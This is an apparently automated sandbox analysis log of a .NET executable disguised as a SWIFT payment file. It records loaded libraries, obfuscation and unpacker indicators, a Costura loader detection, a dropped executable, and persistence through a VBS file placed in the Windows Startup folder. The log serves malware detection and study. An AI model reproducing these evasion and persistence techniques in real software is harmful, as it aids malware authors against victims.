Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process created: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe "C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe"
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1172
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process created: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe "C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe"	Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mscorlib.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3277577960.0000000004DE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb`o source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb= source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2341848379.0000000006210000.00000004.08000000.00040000.00000000.sdmp, 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2338733845.0000000004089000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbu source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbxX source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000000.00000002.2342071551.00000000062D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3o source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe, 00000003.00000002.3274506967.0000000000A04000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.449e0c0.0.raw.unpack, LoggerRunner.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.6210000.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.62d0000.6.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.62d0000.6.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.62d0000.6.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.62d0000.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.62d0000.6.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.60d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2341292549.00000000060D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2320521719.00000000030C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe PID: 6600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe PID: 5280, type: MEMORYSTR

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05E75579 push 00000028h; retf	0_2_05E7557B
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05E75430 push 00000028h; retf	0_2_05E75432
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05E75802 push 00000028h; retf	0_2_05E75804
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_05E75A23 push 00000028h; retf	0_2_05E75A52
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B9538 pushfd ; ret	0_2_060B95C1
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060B3C50 push es; ret	0_2_060B3D00
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_060C23BC push E805FFBDh; retf	0_2_060C23C1
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_061A4B38 push es; ret	0_2_061A4B70
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 0_2_06341BB0 push es; ret	0_2_06341BC0
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Code function: 3_2_00E862E4 push cs; iretd	3_2_00E862E8

Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, d5A0BY5QSYApcouvJBy.cs	High entropy of concatenated method names: 'MVmEbSKYm8', 'kZxEEaCu58', 'pu1EwYYkUs', 'fQsEI09jGG', 'hyXEJLBJh3', 'LEbENhlihW', 'F6ZEtwpYG4', 'ouQ5CygL3v', 'Ml4E0KM3Ib', 'EsWEHr2ysQ'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	High entropy of concatenated method names: 'x2WG26ybgAmeylePAJ1', 'flNViNyEbkToMJdUNQv', 'wlNnKKptIW', 'vh0ry9Sq2v', 'trPn8EVkJY', 'M7yn4WOlEx', 'W0inowUEEW', 'YJGnCDUZ8j', 'qK6xbBKvo5', 'fa5PPuAdxL'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, FoWnKJ5DX0Zoxab9DtX.cs	High entropy of concatenated method names: 'hOJ5Z4MHoC', 'Utf5bL2d4e', 'dUg5EA8xET', 'vIm5wM3qPj', 'zEG5I0kWxZ', 'q335JigSZZ', 'JcW5NqduHR', 'rVS5tMYcw7', 'A4h501Z64r', 'Syu5Herisa'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.3a45a90.2.raw.unpack, WAVSpcJcd2jB3eJdPL.cs	High entropy of concatenated method names: 'g6bRx9ZpP', 'oFpxD0xUS', 'zfjdSMeN1', 'vwCpkpBUg', 'Cfbte8WPm', 'ItH0yuUuA', 'wiiHkDDBL', 'xEdQ0fNHi', 'cG1yuZ3Fl', 'HpbTjD865'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, d5A0BY5QSYApcouvJBy.cs	High entropy of concatenated method names: 'MVmEbSKYm8', 'kZxEEaCu58', 'pu1EwYYkUs', 'fQsEI09jGG', 'hyXEJLBJh3', 'LEbENhlihW', 'F6ZEtwpYG4', 'ouQ5CygL3v', 'Ml4E0KM3Ib', 'EsWEHr2ysQ'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, eSAFpxP2MMuYo8aVPYp.cs	High entropy of concatenated method names: 'x2WG26ybgAmeylePAJ1', 'flNViNyEbkToMJdUNQv', 'wlNnKKptIW', 'vh0ry9Sq2v', 'trPn8EVkJY', 'M7yn4WOlEx', 'W0inowUEEW', 'YJGnCDUZ8j', 'qK6xbBKvo5', 'fa5PPuAdxL'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, FoWnKJ5DX0Zoxab9DtX.cs	High entropy of concatenated method names: 'hOJ5Z4MHoC', 'Utf5bL2d4e', 'dUg5EA8xET', 'vIm5wM3qPj', 'zEG5I0kWxZ', 'q335JigSZZ', 'JcW5NqduHR', 'rVS5tMYcw7', 'A4h501Z64r', 'Syu5Herisa'
Source: 3.2.10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe.5090000.6.raw.unpack, WAVSpcJcd2jB3eJdPL.cs	High entropy of concatenated method names: 'g6bRx9ZpP', 'oFpxD0xUS', 'zfjdSMeN1', 'vwCpkpBUg', 'Cfbte8WPm', 'ItH0yuUuA', 'wiiHkDDBL', 'xEdQ0fNHi', 'cG1yuZ3Fl', 'HpbTjD865'

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

File created: C:\Users\user\AppData\Local\VSImagingNet14_0-setup.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VSImagingNet14_0-setup.vbs

Jump to behavior

Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\10thDecember2024SWIFT-40111-34000-5410-24532-10477-65011-239605.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
